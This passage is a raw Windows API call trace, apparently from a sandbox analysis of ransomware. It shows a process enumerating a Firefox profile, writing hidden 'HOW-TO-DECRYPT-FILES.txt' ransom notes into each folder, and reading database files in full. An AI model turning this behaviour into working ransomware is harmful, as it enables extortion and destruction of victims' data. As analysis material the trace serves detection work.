lpBuffer=0x1d142a0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb10, lpOverlapped=0x0 | out: lpBuffer=0x1d142a0*, lpNumberOfBytesWritten=0x18eb10*=0x18da, lpOverlapped=0x0) returned 1 [0054.994] GetLastError () returned 0x0 [0054.994] CloseHandle (hObject=0x184) returned 1 [0054.994] GetLastError () returned 0x0 [0054.994] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x73 [0054.994] GetLastError () returned 0x0 [0054.994] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0054.994] GetLastError () returned 0x0 [0054.994] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json", lpFilePart=0x0) returned 0x76 [0054.994] GetLastError () returned 0x0 [0054.994] SetErrorMode (uMode=0x1) returned 0x0 [0054.994] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json"), fInfoLevelId=0x0, lpFileInformation=0x1d1601c | out: lpFileInformation=0x1d1601c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd150e220, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xd150e220, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xd155a4e0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0xbdb)) returned 1 [0054.995] GetLastError () returned 0x0 [0054.995] SetErrorMode (uMode=0x0) returned 0x1 [0054.999] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x73 [0054.999] GetLastError () returned 0x0 [0054.999] SetErrorMode (uMode=0x1) returned 0x0 [0054.999] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\bookmarkbackups\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.999] GetLastError () returned 0x5 [0055.000] SetErrorMode (uMode=0x0) returned 0x1 [0055.000] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport", lpFilePart=0x0) returned 0x57 [0055.000] GetLastError () returned 0x5 [0055.000] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.000] GetLastError () returned 0x5 [0055.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.000] GetLastError () returned 0x5 [0055.000] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport", lpFilePart=0x0) returned 0x57 [0055.000] GetLastError () returned 0x5 [0055.000] SetErrorMode (uMode=0x1) returned 0x0 [0055.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0055.001] GetLastError () returned 0x5 [0055.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.001] GetLastError () returned 0x5 [0055.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.001] GetLastError () returned 0x12 [0055.001] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0055.001] SetErrorMode (uMode=0x0) returned 0x1 [0055.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport", lpFilePart=0x0) returned 0x57 [0055.001] GetLastError () returned 0x12 [0055.001] SetErrorMode (uMode=0x1) returned 0x0 [0055.001] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\healthreport\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0055.001] GetLastError () returned 0x12 [0055.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.001] GetLastError () returned 0x12 [0055.001] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.001] GetLastError () returned 0x12 [0055.002] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0055.002] SetErrorMode (uMode=0x0) returned 0x1 [0055.002] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB", lpFilePart=0x0) returned 0x54 [0055.002] GetLastError () returned 0x12 [0055.002] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.002] GetLastError () returned 0x12 [0055.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.002] GetLastError () returned 0x12 [0055.002] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB", lpFilePart=0x0) returned 0x54 [0055.002] GetLastError () returned 0x12 [0055.002] SetErrorMode (uMode=0x1) returned 0x0 [0055.002] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0055.002] GetLastError () returned 0x12 [0055.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.002] GetLastError () returned 0x12 [0055.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.002] GetLastError () returned 0x12 [0055.002] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.003] GetLastError () returned 0x12 [0055.003] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0055.003] SetErrorMode (uMode=0x0) returned 0x1 [0055.003] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB", lpFilePart=0x0) returned 0x54 [0055.003] GetLastError () returned 0x12 [0055.003] SetErrorMode (uMode=0x1) returned 0x0 [0055.003] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0055.003] GetLastError () returned 0x12 [0055.003] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.003] GetLastError () returned 0x12 [0055.003] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.003] GetLastError () returned 0x12 [0055.003] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.003] GetLastError () returned 0x12 [0055.003] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0055.004] SetErrorMode (uMode=0x0) returned 0x1 [0055.004] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home", nBufferLength=0x105, lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home", lpFilePart=0x0) returned 0x68 [0055.004] GetLastError () returned 0x12 [0055.004] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.004] GetLastError () returned 0x12 [0055.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.004] GetLastError () returned 0x12 [0055.004] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home", lpFilePart=0x0) returned 0x68 [0055.004] GetLastError () returned 0x12 [0055.004] SetErrorMode (uMode=0x1) returned 0x0 [0055.004] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0055.004] GetLastError () returned 0x12 [0055.004] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.004] GetLastError () returned 0x12 [0055.004] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.004] GetLastError () returned 0x12 [0055.004] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.004] GetLastError () returned 0x12 [0055.005] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.005] GetLastError () returned 0x12 [0055.005] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0055.005] SetErrorMode (uMode=0x0) returned 0x1 [0055.005] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home", lpFilePart=0x0) returned 0x68 [0055.005] GetLastError () returned 0x12 [0055.005] SetErrorMode (uMode=0x1) returned 0x0 [0055.005] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0055.005] GetLastError () returned 0x12 [0055.005] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.005] GetLastError () returned 0x12 [0055.005] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.005] GetLastError () returned 0x12 [0055.005] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.005] GetLastError () returned 0x12 [0055.006] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.006] GetLastError () returned 0x12 [0055.006] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0055.006] SetErrorMode (uMode=0x0) returned 0x1 [0055.006] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\.metadata", nBufferLength=0x105, lpBuffer=0x18e698, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\.metadata", lpFilePart=0x0) returned 0x72 [0055.006] GetLastError () returned 0x12 [0055.006] SetErrorMode (uMode=0x1) returned 0x0 [0055.006] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\.metadata"), fInfoLevelId=0x0, lpFileInformation=0x1b3c6ec | out: lpFileInformation=0x1b3c6ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x881f23c0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x881f23c0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x881f23c0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0055.006] GetLastError () returned 0x12 [0055.006] SetErrorMode (uMode=0x0) returned 0x1 [0055.007] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x81 [0055.007] GetLastError () returned 0x12 [0055.007] SetErrorMode (uMode=0x1) returned 0x0 [0055.007] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.007] GetLastError () returned 0x0 [0055.007] GetFileType (hFile=0x184) returned 0x1 [0055.007] SetErrorMode (uMode=0x0) returned 0x1 [0055.007] GetFileType (hFile=0x184) returned 0x1 [0055.007] WriteFile (in: hFile=0x184, lpBuffer=0x1b582c8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eaa4, lpOverlapped=0x0 | out: lpBuffer=0x1b582c8*, lpNumberOfBytesWritten=0x18eaa4*=0x18da, lpOverlapped=0x0) returned 1 [0055.008] GetLastError () returned 0x0 [0055.008] CloseHandle (hObject=0x184) returned 1 [0055.008] GetLastError () returned 0x0 [0055.008] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e66c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x81 [0055.008] GetLastError () returned 0x0 [0055.008] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0055.008] GetLastError () returned 0x0 [0055.009] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb", lpFilePart=0x0) returned 0x6c [0055.009] GetLastError () returned 0x0 [0055.009] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.009] GetLastError () returned 0x0 [0055.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.009] GetLastError () returned 0x0 [0055.009] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb", lpFilePart=0x0) returned 0x6c [0055.009] GetLastError () returned 0x0 [0055.009] SetErrorMode (uMode=0x1) returned 0x0 [0055.009] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0055.019] GetLastError () returned 0x0 [0055.019] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.019] GetLastError () returned 0x0 [0055.019] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.019] GetLastError () returned 0x0 [0055.019] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.020] GetLastError () returned 0x0 [0055.020] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.020] GetLastError () returned 0x12 [0055.020] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0055.021] SetErrorMode (uMode=0x0) returned 0x1 [0055.021] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb", lpFilePart=0x0) returned 0x6c [0055.021] GetLastError () returned 0x12 [0055.021] SetErrorMode (uMode=0x1) returned 0x0 [0055.021] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360de0 [0055.021] GetLastError () returned 0x12 [0055.021] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.022] GetLastError () returned 0x12 [0055.022] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.022] GetLastError () returned 0x12 [0055.022] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.022] GetLastError () returned 0x12 [0055.022] FindNextFileW (in: hFindFile=0x360de0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.022] GetLastError () returned 0x12 [0055.022] FindClose (in: hFindFile=0x360de0 | out: hFindFile=0x360de0) returned 1 [0055.023] SetErrorMode (uMode=0x0) returned 0x1 [0055.023] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpFilePart=0x0) returned 0x86 [0055.023] GetLastError () returned 0x12 [0055.023] SetErrorMode (uMode=0x1) returned 0x0 [0055.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1b5c1c0 | out: lpFileInformation=0x1b5c1c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x881f23c0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x881f23c0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc51450a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x108000)) returned 1 [0055.024] GetLastError () returned 0x12 [0055.024] SetErrorMode (uMode=0x0) returned 0x1 [0055.024] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", nBufferLength=0x105, lpBuffer=0x18e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpFilePart=0x0) returned 0x86 [0055.024] GetLastError () returned 0x12 [0055.024] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", nBufferLength=0x105, lpBuffer=0x18e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpFilePart=0x0) returned 0x86 [0055.024] GetLastError () returned 0x12 [0055.024] SetErrorMode (uMode=0x1) returned 0x0 [0055.024] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.024] GetLastError () returned 0x0 [0055.024] GetFileType (hFile=0x184) returned 0x1 [0055.024] SetErrorMode (uMode=0x0) returned 0x1 [0055.025] GetFileType (hFile=0x184) returned 0x1 [0055.025] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ea7c | out: lpFileSizeHigh=0x18ea7c*=0x0) returned 0x108000 [0055.025] GetLastError () returned 0x0 [0055.027] ReadFile (in: hFile=0x184, lpBuffer=0x2de9410, nNumberOfBytesToRead=0x108000, lpNumberOfBytesRead=0x18ea24, lpOverlapped=0x0 | out: lpBuffer=0x2de9410*, lpNumberOfBytesRead=0x18ea24*=0x108000, lpOverlapped=0x0) returned 1 [0055.051] GetLastError () returned 0x0 [0055.051] CloseHandle (hObject=0x184) returned 1 [0055.051] GetLastError () returned 0x0 [0055.066] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", nBufferLength=0x105, lpBuffer=0x18e5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpFilePart=0x0) returned 0x86 [0055.066] GetLastError () returned 0x0 [0055.066] SetErrorMode (uMode=0x1) returned 0x0 [0055.066] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ea8c | out: lpFileInformation=0x18ea8c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x881f23c0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x881f23c0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, 